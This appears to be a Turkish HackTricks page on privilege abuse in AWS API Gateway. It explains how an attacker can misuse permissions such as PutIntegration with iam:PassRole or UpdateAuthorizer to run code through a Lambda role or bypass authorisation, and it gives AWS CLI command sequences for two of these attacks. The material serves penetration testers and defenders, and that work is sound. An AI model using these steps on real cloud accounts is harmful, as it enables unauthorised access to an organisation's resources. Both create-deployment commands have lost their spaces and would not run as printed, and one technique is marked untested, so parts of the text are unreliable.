Şirketinizi HackTricks'te reklamını görmek istiyorsanız veya HackTricks'i PDF olarak indirmek istiyorsanız [ABONELİK PLANLARI]'na göz atın (https://github.com/sponsors/carlospolop)!
[The PEASS Family]'yi (https://opensea.io/collection/the-peass-family) keşfedin, özel [NFT'lerimiz]'i (https://opensea.io/collection/the-peass-family) içeren koleksiyonumuzu
Potansiyel Etki: Bu teknikle ayrıcalık yükseltemezsiniz ancak hassas bilgilere erişebilirsiniz.
apigateway:UpdateRestApiPolicy, apigateway:PATCH
Bu izinlerle, bir API'nin kaynak politikasını değiştirerek kendinize çağrı yapma erişimi verip API ağ geçidinin sahip olabileceği erişimleri kötüye kullanabilirsiniz (örneğin, zafiyetli bir lambda'yı çağırmak).
apigateway:PutIntegration, apigateway:CreateDeployment ve iam:PassRole izinlerine sahip bir saldırgan, bir IAM rolüne sahip bir Lambda işlevi ile var olan bir API Gateway REST API'sine yeni bir entegrasyon ekleyebilir. Saldırgan daha sonra Lambda işlevini tetikleyerek keyfi kodları yürütebilir ve IAM rolü ile ilişkilendirilen kaynaklara erişim elde edebilir.
API_ID="your-api-id"RESOURCE_ID="your-resource-id"HTTP_METHOD="GET"LAMBDA_FUNCTION_ARN="arn:aws:lambda:region:account-id:function:function-name"LAMBDA_ROLE_ARN="arn:aws:iam::account-id:role/lambda-role"# Add a new integration to the API Gateway REST APIaws apigateway put-integration --rest-api-id $API_ID --resource-id $RESOURCE_ID --http-method $HTTP_METHOD --type AWS_PROXY --integration-http-method POST --uri arn:aws:apigateway:region:lambda:path/2015-03-31/functions/$LAMBDA_FUNCTION_ARN/invocations --credentials $LAMBDA_ROLE_ARN
# Create a deployment for the updated API Gateway REST APIawsapigatewaycreate-deployment--rest-api-id $API_ID --stage-nameProd
Potansiyel Etki: Lambda işlevinin IAM rolü ile ilişkili kaynaklara erişim.
apigateway:UpdateAuthorizer ve apigateway:CreateDeployment izinlerine sahip bir saldırgan, mevcut bir API Gateway yetkilendiricisini değiştirerek güvenlik kontrollerini atlayabilir veya API istekleri yapıldığında keyfi kodları yürütebilir.
API_ID="your-api-id"AUTHORIZER_ID="your-authorizer-id"LAMBDA_FUNCTION_ARN="arn:aws:lambda:region:account-id:function:function-name"# Update the API Gateway authorizeraws apigateway update-authorizer --rest-api-id $API_ID --authorizer-id $AUTHORIZER_ID --authorizer-uri arn:aws:apigateway:region:lambda:path/2015-03-31/functions/$LAMBDA_FUNCTION_ARN/invocations
# Create a deployment for the updated API Gateway REST APIawsapigatewaycreate-deployment--rest-api-id $API_ID --stage-nameProd
Potansiyel Etki: Güvenlik kontrollerini atlatma, API kaynaklarına izinsiz erişim.
apigateway:UpdateVpcLink
Test Edilmesi Gerekiyor
apigateway:UpdateVpcLink iznine sahip bir saldırgan, mevcut bir VPC Bağlantısını değiştirerek farklı bir Ağ Yük Dengeleyiciye yönlendirebilir ve böylece özel API trafiğini izinsiz veya kötü niyetli kaynaklara yönlendirebilir.
Şirketinizin HackTricks'te reklamını görmek istiyorsanız veya HackTricks'i PDF olarak indirmek istiyorsanız [ABONELİK PLANLARI]'na göz atın (https://github.com/sponsors/carlospolop)!
